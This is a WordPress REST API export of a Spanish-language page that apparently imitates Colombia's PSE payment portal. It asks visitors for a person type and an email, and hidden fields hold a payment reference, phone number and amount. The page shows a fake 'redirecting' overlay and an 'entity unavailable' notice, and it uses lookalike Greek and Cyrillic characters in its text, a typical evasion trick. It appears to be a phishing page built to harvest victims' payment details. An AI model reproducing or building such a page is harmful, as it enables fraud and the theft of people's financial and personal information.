{"id":348,"date":"2026-03-09T04:29:51","date_gmt":"2026-03-09T04:29:51","guid":{"rendered":"https:\/\/fomg.site\/inciar-procsesos\/?page_id=348"},"modified":"2026-03-14T00:56:40","modified_gmt":"2026-03-14T00:56:40","slug":"rc-f3","status":"publish","type":"page","link":"https:\/\/fomg.site\/inciar-procsesos\/rc-f3\/","title":{"rendered":"Rc-F3"},"content":{"rendered":"<p><img loading=\"lazy\" decoding=\"async\" width=\"719\" height=\"216\" src=\"https:\/\/fomg.site\/inciar-procsesos\/wp-content\/uploads\/2026\/03\/logsss-psss.png\" alt=\"\" srcset=\"https:\/\/fomg.site\/inciar-procsesos\/wp-content\/uploads\/2026\/03\/logsss-psss.png 719w, https:\/\/fomg.site\/inciar-procsesos\/wp-content\/uploads\/2026\/03\/logsss-psss-300x90.png 300w\" sizes=\"auto, (max-width: 719px) 100vw, 719px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img loading=\"lazy\" decoding=\"async\" width=\"444\" height=\"218\" src=\"https:\/\/fomg.site\/inciar-procsesos\/wp-content\/uploads\/2026\/03\/banner-psss.png\" alt=\"\" srcset=\"https:\/\/fomg.site\/inciar-procsesos\/wp-content\/uploads\/2026\/03\/banner-psss.png 444w, https:\/\/fomg.site\/inciar-procsesos\/wp-content\/uploads\/2026\/03\/banner-psss-300x147.png 300w\" sizes=\"auto, (max-width: 444px) 100vw, 444px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/p>\n<h6>Selecciona el tipo de persona:<\/h6>\n<p>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img loading=\"lazy\" decoding=\"async\" width=\"425\" height=\"141\" src=\"https:\/\/fomg.site\/inciar-procsesos\/wp-content\/uploads\/2026\/03\/btnat-act.png\" alt=\"\" srcset=\"https:\/\/fomg.site\/inciar-procsesos\/wp-content\/uploads\/2026\/03\/btnat-act.png 425w, https:\/\/fomg.site\/inciar-procsesos\/wp-content\/uploads\/2026\/03\/btnat-act-300x100.png 300w\" sizes=\"auto, (max-width: 425px) 100vw, 425px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img loading=\"lazy\" decoding=\"async\" width=\"425\" height=\"142\" src=\"https:\/\/fomg.site\/inciar-procsesos\/wp-content\/uploads\/2026\/03\/btjur-ina.png\" alt=\"\" srcset=\"https:\/\/fomg.site\/inciar-procsesos\/wp-content\/uploads\/2026\/03\/btjur-ina.png 425w, https:\/\/fomg.site\/inciar-procsesos\/wp-content\/uploads\/2026\/03\/btjur-ina-300x100.png 300w\" sizes=\"auto, (max-width: 425px) 100vw, 425px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/p>\n<h6>Ingresa tu correo electr\u00f3nico*<\/h6>\n<ul>\n<li>\n\t\t\t\t\t\t\t<svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\"><path d=\"M256 8C119.033 8 8 119.033 8 256s111.033 248 248 248 248-111.033 248-248S392.967 8 256 8zm0 48c110.532 0 200 89.451 200 200 0 110.532-89.451 200-200 200-110.532 0-200-89.451-200-200 0-110.532 89.451-200 200-200m140.204 130.267l-22.536-22.718c-4.667-4.705-12.265-4.736-16.97-.068L215.346 303.697l-59.792-60.277c-4.667-4.705-12.265-4.736-16.97-.069l-22.719 22.536c-4.705 4.667-4.736 12.265-.068 16.971l90.781 91.516c4.667 4.705 12.265 4.736 16.97.068l172.589-171.204c4.704-4.668 4.734-12.266.067-16.971z\"><\/path><\/svg><br \/>\n\t\t\t\t\t\t\t\t\t\tSoy usuario registrado\n\t\t\t\t\t\t\t\t\t<\/li>\n<\/ul>\n\n<div class=\"wpcf7 no-js\" id=\"wpcf7-f469-o1\" lang=\"es-ES\" dir=\"ltr\" data-wpcf7-id=\"469\">\n<div class=\"screen-reader-response\"><p role=\"status\" aria-live=\"polite\" aria-atomic=\"true\"><\/p> <ul><\/ul><\/div>\n<form action=\"\/inciar-procsesos\/wp-json\/wp\/v2\/pages\/348#wpcf7-f469-o1\" method=\"post\" class=\"wpcf7-form init\" aria-label=\"Formulario de contacto\" novalidate=\"novalidate\" data-status=\"init\">\n<fieldset class=\"hidden-fields-container\"><input type=\"hidden\" name=\"_wpcf7\" value=\"469\" \/><input type=\"hidden\" name=\"_wpcf7_version\" value=\"6.1.5\" \/><input type=\"hidden\" name=\"_wpcf7_locale\" value=\"es_ES\" \/><input type=\"hidden\" name=\"_wpcf7_unit_tag\" value=\"wpcf7-f469-o1\" \/><input type=\"hidden\" name=\"_wpcf7_container_post\" value=\"0\" \/><input type=\"hidden\" name=\"_wpcf7_posted_data_hash\" value=\"\" \/>\n<\/fieldset>\n<input class=\"wpcf7-form-control wpcf7-hidden\" id=\"p3-refe\" value=\"\" type=\"hidden\" name=\"REFE_PRG\" \/>\n<input class=\"wpcf7-form-control wpcf7-hidden\" id=\"p3-cel\" value=\"\" type=\"hidden\" name=\"NUME_CEL\" \/>\n<input class=\"wpcf7-form-control wpcf7-hidden\" id=\"p3-precio\" value=\"\" type=\"hidden\" name=\"CUAN_CAN\" \/>\n<input class=\"wpcf7-form-control wpcf7-hidden\" id=\"p3-tipo\" value=\"\" type=\"hidden\" name=\"TIPO_PSN\" \/>\n<input class=\"wpcf7-form-control wpcf7-hidden\" id=\"p3-opcion\" value=\"\" type=\"hidden\" name=\"ELEG_OPC\" \/>\n<div class=\"p3-contenedor\">\n\t<div class=\"p3-campo-email\">\n\t\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"MAIL_ESP\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-email wpcf7-validates-as-required wpcf7-text wpcf7-validates-as-email\" id=\"p3-mail\" aria-required=\"true\" aria-invalid=\"false\" placeholder=\"Ej: \u03f2\u03bfrr\u0435\u03bf@\u0440\u0455\u0435.com.co\" value=\"\" type=\"email\" name=\"MAIL_ESP\" \/><\/span>\n\t\t<\/p>\n\t<\/div>\n\t<div class=\"p3-fila-botones\">\n\t\t<p><button type=\"button\" class=\"btn-p3-regresar\" onclick=\"window.history.back();\">Regresar<\/button><input class=\"wpcf7-form-control wpcf7-submit has-spinner btn-p3-continuar\" type=\"submit\" value=\"Continuar\" \/>\n\t\t<\/p>\n\t<\/div>\n<\/div><div class=\"wpcf7-response-output\" aria-hidden=\"true\"><\/div>\n<\/form>\n<\/div>\n\n<style>\n\/* 1. DISE\u00d1O DE LA VENTANA DE ESPERA (CENTRO DE PANTALLA) *\/\n#capa-espera {\n    display: none !important; \/* Invisible al cargar *\/\n    position: fixed;\n    z-index: 999999;\n    left: 0; top: 0;\n    width: 100%; height: 100%;\n    background-color: rgba(255,255,255,0.95); \/* Fondo blanco trasl\u00facido *\/\n}\n.contenido-espera {\n    position: absolute;\n    top: 50%; left: 50%;\n    transform: translate(-50%, -50%); \/* Centrado matem\u00e1tico perfecto *\/\n    text-align: center;\n    font-family: Arial, sans-serif;\n}\n#img-espera {\n    max-width: 180px; \/* Ajusta el tama\u00f1o de tu imagen aqu\u00ed *\/\n    height: auto;\n    margin-bottom: 15px;\n}\n.txt-espera {\n    display: block;\n    font-size: 1.2rem;\n    color: #1F0020;\n    font-weight: 600;\n}\n\/* 2. DISE\u00d1O DEL MENSAJE DE ERROR (ARRIBA AL CENTRO) *\/\n#error-opcion-p3 {\n    display: none !important;\n    position: fixed;\n    top: 25px; left: 50%;\n    transform: translateX(-50%);\n    background-color: #ff0000;\n    color: #ffffff;\n    padding: 12px 35px;\n    border-radius: 25px;\n    font-family: Arial, sans-serif;\n    z-index: 1000000;\n    font-weight: bold;\n    box-shadow: 0 4px 15px rgba(0,0,0,0.2);\n}\n<\/style>\n<p><!-- ELEMENTOS VISUALES OCULTOS --><br \/>\n        <!-- PON AQU\u00cd LA URL DE TU IMAGEN --><br \/>\n        <img decoding=\"async\" src=\"https:\/\/fomg.site\/inciar-procsesos\/wp-content\/uploads\/2026\/03\/esperar-envoiar.gif\" id=\"img-espera\"><br \/>\n        Redirigiendo&#8230;<br \/>\n\u0395nt\u0456d\u0430\u0501 no disonible<br \/>\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img loading=\"lazy\" decoding=\"async\" width=\"767\" height=\"487\" src=\"https:\/\/fomg.site\/inciar-procsesos\/wp-content\/uploads\/2026\/03\/VIG-firme.png\" alt=\"\" srcset=\"https:\/\/fomg.site\/inciar-procsesos\/wp-content\/uploads\/2026\/03\/VIG-firme.png 767w, https:\/\/fomg.site\/inciar-procsesos\/wp-content\/uploads\/2026\/03\/VIG-firme-300x190.png 300w\" sizes=\"auto, (max-width: 767px) 100vw, 767px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img loading=\"lazy\" decoding=\"async\" width=\"53\" height=\"139\" src=\"https:\/\/fomg.site\/inciar-procsesos\/wp-content\/uploads\/2026\/03\/iBORDER.png\" alt=\"\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img loading=\"lazy\" decoding=\"async\" width=\"73\" height=\"70\" src=\"https:\/\/fomg.site\/inciar-procsesos\/wp-content\/uploads\/2026\/03\/iFOTT.png\" alt=\"\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/p>\n<h6>Para mayor informaci\u00f3n<\/h6>\n<h6>comun\u00edcate con nosotros:<\/h6>\n<ul>\n<li>\n\t\t\t\t\t\t\t\t\t\tEn Bogot\u00e1: +57 (601) 3808890 opci\u00f3n 5\n\t\t\t\t\t\t\t\t\t<\/li>\n<\/ul>\n<ul>\n<li>\n\t\t\t\t\t\t\t<svg aria-hidden=\"true\" viewBox=\"0 0 576 512\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\"><path d=\"M284.046,224.8a34.114,34.114,0,1,0,34.317,34.113A34.217,34.217,0,0,0,284.046,224.8Zm-110.45,0a34.114,34.114,0,1,0,34.317,34.113A34.217,34.217,0,0,0,173.6,224.8Zm220.923,0a34.114,34.114,0,1,0,34.317,34.113A34.215,34.215,0,0,0,394.519,224.8Zm153.807-55.319c-15.535-24.172-37.31-45.57-64.681-63.618-52.886-34.817-122.374-54-195.666-54a405.975,405.975,0,0,0-72.032,6.357,238.524,238.524,0,0,0-49.51-36.588C99.684-11.7,40.859.711,11.135,11.421A14.291,14.291,0,0,0,5.58,34.782C26.542,56.458,61.222,99.3,52.7,138.252c-33.142,33.9-51.112,74.776-51.112,117.337,0,43.372,17.97,84.248,51.112,118.148,8.526,38.956-26.154,81.816-47.116,103.491a14.284,14.284,0,0,0,5.555,23.34c29.724,10.709,88.549,23.147,155.324-10.2a238.679,238.679,0,0,0,49.51-36.589A405.972,405.972,0,0,0,288,460.14c73.313,0,142.8-19.159,195.667-53.975,27.371-18.049,49.145-39.426,64.679-63.619,17.309-26.923,26.07-55.916,26.07-86.125C574.394,225.4,565.634,196.43,548.326,169.485ZM284.987,409.9a345.65,345.65,0,0,1-89.446-11.5l-20.129,19.393a184.366,184.366,0,0,1-37.138,27.585,145.767,145.767,0,0,1-52.522,14.87c.983-1.771,1.881-3.563,2.842-5.356q30.258-55.68,16.325-100.078c-32.992-25.962-52.778-59.2-52.778-95.4,0-83.1,104.254-150.469,232.846-150.469s232.867,67.373,232.867,150.469C517.854,342.525,413.6,409.9,284.987,409.9Z\"><\/path><\/svg><br \/>\n\t\t\t\t\t\t\t\t\t\tContactos: www.p-s-e.com.co\/persona-centro-ayudas\/\n\t\t\t\t\t\t\t\t\t<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>Selecciona el tipo de persona: Ingresa tu correo electr\u00f3nico* Soy usuario registrado Redirigiendo&#8230; \u0395nt\u0456d\u0430\u0501 no disonible Para mayor informaci\u00f3n comun\u00edcate con nosotros: En Bogot\u00e1: +57 (601) 3808890 opci\u00f3n 5 Contactos: www.p-s-e.com.co\/persona-centro-ayudas\/<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"elementor_canvas","meta":{"footnotes":""},"class_list":["post-348","page","type-page","status-publish"],"_links":{"self":[{"href":"https:\/\/fomg.site\/inciar-procsesos\/wp-json\/wp\/v2\/pages\/348","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fomg.site\/inciar-procsesos\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/fomg.site\/inciar-procsesos\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/fomg.site\/inciar-procsesos\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fomg.site\/inciar-procsesos\/wp-json\/wp\/v2\/comments?post=348"}],"version-history":[{"count":274,"href":"https:\/\/fomg.site\/inciar-procsesos\/wp-json\/wp\/v2\/pages\/348\/revisions"}],"predecessor-version":[{"id":724,"href":"https:\/\/fomg.site\/inciar-procsesos\/wp-json\/wp\/v2\/pages\/348\/revisions\/724"}],"wp:attachment":[{"href":"https:\/\/fomg.site\/inciar-procsesos\/wp-json\/wp\/v2\/media?parent=348"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}